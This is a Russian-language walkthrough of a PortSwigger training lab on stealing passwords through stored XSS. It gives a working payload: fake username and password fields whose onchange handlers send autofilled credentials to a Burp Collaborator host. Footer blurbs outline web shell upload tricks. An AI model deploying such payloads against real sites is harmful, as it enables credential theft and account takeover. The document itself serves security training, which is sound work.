На странице
Захват паролей через XSS
Лаборатория
Exploiting cross-site scripting to capture passwords · Practitioner
Разведка
Идём сразу в поле коммента и проверяем XSS — COMMENT<>'"\. Есть XSS.
Далее простая нагрузка — <img src=x onerror=fetch(1)> — работает.
Эксплуатация
Подход
PortSwigger в теории предлагает создать поддельные инпуты, которые браузер заполнит данными из автозаполнения — если пользователь сохранял свой пароль. Чтобы этот механизм сработал, поля создаём со следующими атрибутами:
<input name=username id=username>
<input type=password name=password>
Эксфильтрация
Теперь нужно отправить полученные данные на сервер. Будем использовать Burp Collaborator. Триггером для отправки имени и пароля будет событие onchange.
Итоговая нагрузка:
<input name=username id=username onchange=fetch("https://6pwq1k8rxl5e6swnw369cafh58bzzpne.oastify.com?user="+this.value)>
<input type=password name=password onchange=fetch("https://6pwq1k8rxl5e6swnw369cafh58bzzpne.oastify.com?pwd="+this.value)>
Будьте внимательны: нагрузка в комментах должна быть одна (итоговую тестите на новом посте, где нет комментов, иначе автозаполнение формы ломается).
Результат
В Burp прилетело 3 запроса:
GET /?user=administratoradministrator HTTP/1.1
GET /?pwd=mba29ry6e4jzms6kv354 HTTP/1.1
GET /?user=administrator HTTP/1.1
Первый — странный.
Пробуем administrator / mba29ry6e4jzms6kv354 — сработало.
Ещё в этой категории
Web Shell Upload через обход блек-листа расширений (PortSwigger Lab)
.php в блек-листе, но .htaccess заливается без вопросов — подсовываем свой конфиг Apache и заставляем сервер исполнять shell.bug как PHP.
Web Shell Upload через обфускацию расширения (PortSwigger Lab)
Блек-лист расширений не пускает .php, двойное расширение shell.php.jpg отдаётся как картинка — null-byte shell.php%00.jpg обходит обе проверки.
Remote Code Execution через загрузку web shell (PortSwigger Lab)
Загрузка аватарки без валидации — заливаем PHP web shell и читаем /home/carlos/secret.